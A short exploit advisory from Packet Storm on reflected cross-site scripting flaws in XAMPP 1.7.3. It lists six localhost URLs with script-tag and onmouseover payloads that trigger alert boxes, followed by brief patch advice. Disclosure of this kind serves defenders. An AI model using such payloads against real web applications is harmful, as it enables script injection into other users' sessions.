Xampp version 1.7.3 suffers from cross site scripting vulnerabilities.
cfa75a86bb04fd0187323ca1520ef21ceb770a0cb9dc22d7071c54e13b557fb2#**********************************************************
# Exploit Title: Xampp 1.7.3 multiple vulnerabilities
# Date: 11/06/2010
# Author: Sangteamtham
# Software Link: http://www.apachefriends.org/en/xampp.html
# Version: 1.7.3
# Tested on: Windows 7
# Email: Sangteamtham@gmail.com
# Blog: http://sangte.blogspot.com/
# Homepage: http://hcegroup.net/hceteam
#***********************************************************
1.Description:
XAMPP is an easy to install Apache distribution containing MySQL, PHP and Perl. XAMPP is really very easy to install and to use - just download, extract and start.
2. Vulnerabilities:
http://localhost/xampp/ming.php/"<script>alert("XSS")</script>
http://localhost/xampp/iart.php/"onmouseover=prompt("XSS")>
http://localhost/xampp/cds.php/'onmouseover=alert("XSS")>
http://localhost/xampp/aspinfo.asp/1<script>alert("XSS")</script>
http://localhost/xampp/adodb.php/"onmouseover=prompt("XSS")>
http://localhost/xampp/perlinfo.pl/1<script>prompt("XSS")</script>
3. Poc:
4. Patch:
Vender should filter the special characters when input the form.
Clients should set password access to xampp folder.
5. Credits:
Thanks flying to Vietnamese hackers and all hackers out there researching for more security.
*************************************************************
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed